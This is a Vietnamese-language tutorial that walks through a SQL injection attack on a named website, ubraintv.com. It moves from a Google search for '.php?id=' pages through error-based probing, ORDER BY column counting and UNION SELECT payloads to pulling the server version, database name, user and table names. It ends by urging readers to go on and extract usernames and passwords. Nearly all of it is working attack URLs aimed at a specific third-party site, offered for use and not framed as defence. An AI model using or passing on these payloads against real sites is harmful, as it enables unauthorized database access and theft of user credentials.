GOOGLE TÌM KIẾM TỪ KHÓA .php?id=
Lấy được link web sau http://www.ubraintv.com/watchchannel.php?id=6
Thêm vào cuối liên kết trên một trong các meta character đã nói ở trên, chẳng hạn ta thêm vào dấu nháy đơn( hoặc dấu – ,+,vv)
http://www.ubraintv.com/watchchannel.php?id=6’
THÔNG BÁO LỖI TỪ MYSQL SERVER HIỆN RA .
**THU THẬP THÔNG TIN **
Như hình trên chúng ta thấy database web này xài MySQL
Ta bắt đầu xác định số cột (column) , ta mò random
http://www.ubraintv.com/watchchannel.php?id=6’ order by 1– –
Mò được tới
http://www.ubraintv.com/watchchannel.php?id=6’ order by 8– –
gặp lỗi
Vậy suy ra có 7 cột từ 1->7
Sau khi lấy được các thông tin cơ bản, chúng ta sẽ tiến hành khai thác SQL injection để lấy cơ sở dữ liệu hay thực hiện những hành vi khác thông qua lỗ hổng này. Ta tìm cột lỗi thôi
http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,2,3,4,5,6,7– –
Ta sẽ khai thác vào 2 điểm hỏng này .
Lấy version và tên database
http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,version(),3,database(),5,6,7– –
Vesion 5.1.73
Tên Data ubraintv
Ta sẽ tiến hành them khai thác user ()
http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,user(),3,4, 5,6,7– –
Tiếp tục khai thác thông tin các bảng .
http://www.ubraintv.com/watchchannel.php?id=6’union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7 from information_schema.tables where table_name = database()– –
KHI ĐÃ CÓ CÁC BẢNG BẠN CỨ TRUY VẤN TIẾP NHỮNG THÔNG TIN MÌNH CẦN LẤY NHƯ USERNAME HAY PASSWORD…. Cảm ơn các bạn đã xem bài .